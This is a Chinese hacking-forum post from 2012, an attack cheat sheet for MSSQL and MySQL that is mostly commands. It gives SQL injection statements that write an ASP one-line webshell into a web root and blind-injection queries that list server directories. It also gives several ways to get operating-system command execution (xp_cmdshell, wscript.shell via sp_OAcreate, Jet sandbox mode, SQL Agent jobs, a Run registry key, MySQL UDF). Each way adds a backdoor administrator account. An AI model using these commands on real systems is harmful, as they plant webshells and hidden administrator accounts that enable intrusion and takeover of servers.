找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2898|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马' j# _/ @9 T% ^% q0 ]* ]
首先确定网站的WEB路径/ |/ J% ?/ B, s9 o9 R1 K" B9 R
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马/ Z3 \% f( c1 E

+ |( Z1 I% v# S! U; u, W;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- # U' p( X9 d9 D8 }2 S
//将一句话木马插入表中
, I2 j; J, D1 l. G3 O
' D* M! V7 n) R* ^/ \;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
( h9 w+ ^- C3 L% v//导出一个ASP文件8 a$ `( D& b: O5 s2 h1 p, Y: o
3 h# V3 s# @+ h: q- u/ `: _
0 Y* P0 P# F  ?: e. A: T
关于MSSQL列目录
  b- |9 C" [$ ^0 V' A# y;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
- [2 s1 W8 c, ]4 L. G3 }: dInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
% d) E6 _8 [) S3 n* F
) C4 t6 ^& E- b1 z; n0 Pand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
: p# ?1 A% Y$ q- y6 H/ V% R" f
" m2 b" D$ h- h6 M5 u: b4 @And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段, c2 ]! y  H" B9 a/ H) V6 u" @
! G# E$ \- g; w6 o3 d( ^# J* a5 c
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
' h7 |* e2 h& K' _! l" R5 r" X/ D& {; e$ H: K9 l* M( c( P
4 @- N. B8 q( |3 j' u' g: I
数据库版本和权限查看
2 d) w: ], q/ B9 p. a5 _1 Rand 1=(select @@VERSION) //查看详细的数据库信息.
, F; u" y9 j, q' Jand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA& `' T' P8 @2 v0 E/ C
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER: H& ?  A# Y7 B
' z) p% A, }5 V4 I. i, X4 m. M

8 c) f/ @0 A# u1 X1.利用xp_cmdshell执行命令) I( D& S& L" I6 S
exec master..xp_cmdshell 'net user rfire 123456 /add'/ C& f3 D$ }: l9 [6 F6 D) W
exec master..xp_cmdshell 'net localgroup administrators rfire /add'8 i" p: L: C3 Y' |2 l
+ ^7 \: c( T. Z6 I0 k5 t" j
恢复xp_cmdshell存储过程
9 w5 F+ Q/ s8 S# E( o  iExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 k) W8 V. M; p$ l4 E6 A
1 e8 d; G% k7 k( e2 Q7 {
  t9 L" K) E* E$ D3 s# P3 H
2.利用SP_OAcreate和SP_OAMETHOD执行命令
( B& x0 h0 i0 C; ?8 w, R" S/ U: u在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下' {/ Z4 e4 {7 w2 j7 P7 g) G9 m
DECLARE @shell INT //建立一个@shell实体& L$ X+ {( {9 a6 f1 \
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
3 `( w4 z, [8 p/ N) g: s( JEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例/ E3 i% ~. ^0 V

. ~) T6 R. @1 ~; s
- s8 @3 R. u7 R4 Y' A+ S3.利用沙盒模式( \& f$ A' U. W' S5 h9 P8 V
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。5 L; e9 {  P' z% v% }
开启沙盒模式:
8 U8 F. m6 W% [' X4 A  l, M3 i1 W9 rEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',04 A; J& C: S" s8 i; J- `+ G
4 Y1 B% m/ E' P& S$ Q, e( ]* X
执行命令:4 b# d- {& w6 g2 C! `
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');/ o9 E- E  F: i2 K5 C  ?

1 V" m! h+ M' J4 p
% q, Y& E. K6 X" d0 A4.利用SQL代理执行命令$ o" g" y4 M2 s* r' }4 a
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
% `4 _# b3 Y# d7 I. n, F( E  h! Q
# V$ W; T& t4 `. t' D5 E* O% ]执行命令:5 g5 M  i" I( ?
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错. t$ j( g# ?- m
exec sp_add_job 'x'8 d+ p. u- q7 e% M1 D
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业" l1 X; z0 I* g3 \7 W
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
5 Z( G. a1 Y4 k& n# b3 b; D0 B6 v" B' G/ @5 C! n, z8 p2 _

( K$ j; v/ G: n) G5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
+ D& F( u) Z' `+ g& d: `. fEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'  B' }- V" }, |8 R8 Q' z

' |$ A. G6 _" v/ f, g  o) L' z: V# w& Y! ^& L2 W
6.MYSQL的命令执行' |  t# A2 }0 ^" a; Z
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)  Y7 y4 e& \6 |2 i6 y4 x- S
首先要在su.php下导出c:\windows\udf.dll
" ^4 P9 b4 d( u导出后执行创建自定义函数命令:
- i+ T1 c# n9 k* v8 u$ SCreate Function cmdshell returns string soname 'udf.dll'
/ c8 C7 `+ G0 q- w& m( [执行命令
7 J  \" N1 P9 C- z0 rselect cmdshell('net user rfire 123456 /add'). h' O$ }& ^, N% ^6 E: x
执行后删除函数 drop function cmdshell. D$ s) z/ {% K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表